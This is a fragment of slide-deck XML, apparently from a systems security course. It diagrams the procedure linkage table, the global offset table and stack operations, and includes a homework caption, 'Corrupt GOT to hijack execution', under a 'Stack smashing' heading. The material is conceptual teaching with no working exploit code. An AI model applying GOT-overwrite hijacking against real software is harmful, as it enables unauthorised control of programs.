                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t># PLT[0]: call dynamic linker </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" i="1" dirty="0">
              <a:latin typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005a0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> *GOT[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005a6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>jmpq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  *GOT[2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t># PLT[2]: call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1200" i="1" dirty="0">
              <a:latin typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005c0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>jmpq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  *GOT[4]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005c6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005cb: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>jmpq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  4005a0</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:p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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2998177"/>
            <a:ext cx="25485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400" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:t>Procedure linkage table (PLT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Helvetica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87569" y="2743200"/>
            <a:ext cx="682870" cy="1608992"/>
            <a:chOff x="187569" y="2743200"/>
            <a:chExt cx="682870" cy="1608992"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Straight Connector 31"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="492369" y="2751992"/>
              <a:ext cx="37807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492369" y="2743200"/>
              <a:ext cx="0" cy="16002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492369" y="4352192"/>
              <a:ext cx="254977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Oval 42"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="187569" y="2819400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95592" y="4413738"/>
            <a:ext cx="551754" cy="219104"/>
            <a:chOff x="195592" y="4413738"/>
            <a:chExt cx="551754" cy="219104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Straight Connector 36"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="492369" y="4413738"/>
              <a:ext cx="23452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92369" y="4536831"/>
              <a:ext cx="254977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492369" y="4413738"/>
              <a:ext cx="0" cy="123092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Oval 43"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="195592" y="4413738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11369" y="3276600"/>
            <a:ext cx="635977" cy="1444869"/>
            <a:chOff x="111369" y="3276600"/>
            <a:chExt cx="635977" cy="1444869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Connector 39"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="111369" y="4721469"/>
              <a:ext cx="615521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111369" y="3552092"/>
              <a:ext cx="0" cy="1169377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111369" y="3552092"/>
              <a:ext cx="635977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Oval 44"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="111369" y="3276600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3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159369" y="3505200"/>
            <a:ext cx="901874" cy="304801"/>
            <a:chOff x="3159369" y="3505200"/>
            <a:chExt cx="901874" cy="304801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Oval 45"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3540369" y="3505200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4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76" name="Straight Arrow Connector 40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3159369" y="3810000"/>
              <a:ext cx="901874" cy="1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3" name="Group 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5410200" y="228600"/>
            <a:ext cx="3261946" cy="1846385"/>
            <a:chOff x="685800" y="228600"/>
            <a:chExt cx="3261946" cy="1846385"/>
          </a:xfrm>
        </p:grpSpPr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685800" y="228600"/>
              <a:ext cx="3261946" cy="184638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algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New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788435" y="788333"/>
              <a:ext cx="3097765" cy="12251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GOT[0]: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> of .dynamic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GOT[1]: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US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addr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 of </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US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reloc</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US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 entries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GOT[2]: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> of dynamic linker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GOT[3]: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b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0x4005b6  </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="11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# sys startup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GOT[4]: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="11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&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1100" b="1" i="1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printf</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="11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/>
                </a:rPr>
                <a:t>()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Courier New"/>
                </a:rPr>
                <a:t>GOT[5]: 0x4005d6  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t># exit()</a:t>
              </a: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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="719276" y="536331"/>
              <a:ext cx="218034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dirty="0" smtClean="0">
                  <a:latin typeface="Helvetica" charset="0"/>
                </a:rPr>
                <a:t>Global offset table (GOT)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="685800" y="228600"/>
              <a:ext cx="129875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i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Helvetica" charset="0"/>
                </a:rPr>
                <a:t>Data segment</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Helvetica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375030" y="2209800"/>
            <a:ext cx="3464170" cy="2831123"/>
            <a:chOff x="5375030" y="2209800"/>
            <a:chExt cx="3464170" cy="2831123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375030" y="2209800"/>
              <a:ext cx="3464170" cy="283112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t" anchorCtr="0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endParaRPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="sk-SK" sz="1400" dirty="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>callq 0x4005c0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="sk-SK" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t># call </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>printf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="sk-SK" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>() </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5375031" y="2209800"/>
              <a:ext cx="134844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i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Helvetica" charset="0"/>
                </a:rPr>
                <a:t>Code segment</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Helvetica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5444189" y="3256085"/>
              <a:ext cx="3069696" cy="172329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200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t># PLT[0]: call dynamic linker </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005a0: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>pushq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> *GOT[1]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005a6: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>jmpq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>  *GOT[2]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t># PLT[2]: call </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>printf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
              <a:endParaRPr lang="cs-CZ" sz="1200" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005c0: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>jmpq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>  *GOT[4]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005c6: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>pushq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>0x1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005cb: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>jmpq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>  4005a0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endPara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endParaRPr>
            </a:p>
            <a:p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endParaRPr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5375031" y="3009900"/>
              <a:ext cx="254858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xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas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1400" dirty="0" smtClean="0">
                  <a:latin typeface="Helvetica" charset="0"/>
                </a:rPr>
                <a:t>Procedure linkage table (PLT)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica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76800" y="2754923"/>
            <a:ext cx="682870" cy="1608992"/>
            <a:chOff x="4876800" y="2754923"/>
            <a:chExt cx="682870" cy="1608992"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="78" name="Straight Connector 77"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5181600" y="2763715"/>
              <a:ext cx="37807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 flipV="1">
              <a:off x="5181600" y="2754923"/>
              <a:ext cx="0" cy="16002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5181600" y="4363915"/>
              <a:ext cx="254977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Oval 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4876800" y="2831123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7848600" y="4038600"/>
            <a:ext cx="901874" cy="316524"/>
            <a:chOff x="7848600" y="4038600"/>
            <a:chExt cx="901874" cy="316524"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Oval 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8229600" y="4038600"/>
              <a:ext cx="220577" cy="21910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16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3" name="Straight Arrow Connector 40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7848600" y="4355123"/>
              <a:ext cx="901874" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 5000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="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas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 xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas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" name="TextBox 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="5715000"/>
            <a:ext cx="7370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PLT homework: Corrupt GOT to hijack execution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00400" y="3810000"/>
            <a:ext cx="916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+mn-lt"/>
              </a:rPr>
              <a:t>To linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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848600" y="4343400"/>
            <a:ext cx="10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2060"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>To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endParaRPr lang="en-US" sz="14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5" grpId="0" animBg="1"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="102" grpId="0"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="4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Stack smashing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2895600" y="55626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0" y="54864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0" y="47244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0" y="51054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5943600" y="3352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0x100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4267200" y="5562600"/>
            <a:ext cx="1371600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEC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2895600" y="2590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2895600" y="2209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0x118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2895600" y="3352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0x100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4267200" y="5181600"/>
            <a:ext cx="1371600" cy="3810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555</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/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4267200" y="4800600"/>
            <a:ext cx="1371600" cy="3810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213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267200" y="3352800"/>
            <a:ext cx="1371600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00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213</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9237" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="2971800"/>
            <a:ext cx="1371600" cy="3810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9238" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="1752600"/>
            <a:ext cx="1371600" cy="12192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Stack Operation Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9240" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2971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9241" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2590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42" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2209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0x118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43" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="5181600"/>
            <a:ext cx="1371600" cy="3810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555</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9244" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4800600"/>
            <a:ext cx="1371600" cy="3810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213</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9245" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2971800"/>
            <a:ext cx="1371600" cy="3810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9246" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="1752600"/>
            <a:ext cx="1371600" cy="12192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0"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="5562600"/>
            <a:ext cx="1371600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEC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4267200" y="5562600"/>
            <a:ext cx="1371600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="66CC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0x100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4189413" y="1219200"/>
            <a:ext cx="15525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pushq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50" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="2971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9251" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="2590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52" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="2209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0x118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943600" y="4800600"/>
            <a:ext cx="2743200" cy="1143000"/>
            <a:chOff x="5943600" y="4800600"/>
            <a:chExt cx="2743200" cy="1143000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9228" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7315200" y="5181600"/>
              <a:ext cx="1371600" cy="381000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>
                  <a:solidFill>
                    <a:srgbClr val="000066"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>555</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9256" name="Rectangle 39"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7315200" y="5562600"/>
              <a:ext cx="1371600" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CCEC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</a:rPr>
                <a:t>0x100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sp>
          <p:nvSpPr>
            <p:cNvPr id="9218" name="Rectangle 1"/>
            <p:cNvSpPr>
